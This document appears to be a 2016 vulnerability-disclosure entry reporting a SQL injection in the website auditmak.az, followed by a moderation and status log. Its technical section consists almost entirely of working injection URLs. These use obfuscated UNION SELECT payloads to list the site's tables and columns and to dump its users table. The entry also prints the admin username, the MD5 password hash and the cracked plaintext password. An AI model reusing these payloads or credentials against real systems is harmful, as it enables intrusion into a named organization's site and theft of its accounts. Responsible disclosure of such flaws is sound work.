SQL injection

auditmak.az 22 June 2016, 12:06

Detailed information

SQl inject here: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27%20%2F*!12345union*%2F%20%2F*!12345select*%2F%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--%20-%27
Table names: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(table_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.tables*/+/*!12345where*/+/*!12345table_schema=database()*/--+-%27
USers: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(column_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.columns*/+/*!12345where*/+/*!12345table_name=0x7573657273*/--+-%27
Username and password dump: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(username,0x3a,password)*/,9,10,11+/*!12345from*/+/*!12345users*/--+-%27
username: admin
password: 5edc2995b340ac9fd2cc555e94384c87 md5 hash( makaudit123 )

Screens

Comments

  • 21 October 2016, 14:01
    Vulnerability status
    Have not any information from source

  • 04 October 2016, 10:04
    Added point to Vulnerability
    For translate of bug gived 10 point to translator

  • 04 October 2016, 10:04
    Added point to Vulnerability
    For translate of bug gived 1 point to translator

  • 07 September 2016, 13:51
    Vulnerability status
    Sended e-mail to source about vulnerability

  • 07 September 2016, 11:31
    Added point to Vulnerability
    Moderator gave 10 point from 10 to vulnerability

  • 07 September 2016, 11:12
    Vulnerability status
    Confirmed by Moderator

  • 06 September 2016, 18:03
    Vulnerability changed
    Vulnerability "SQL injection" changed

  • 30 June 2016, 14:49
    Vulnerability cancelled
    Linklər qeyd edilən məlumatı göstərmir. Zəhmət lmasa screenlər yollayın.

  • 22 June 2016, 12:06
    Vulnerability added
    Vulnerability added to BUGemot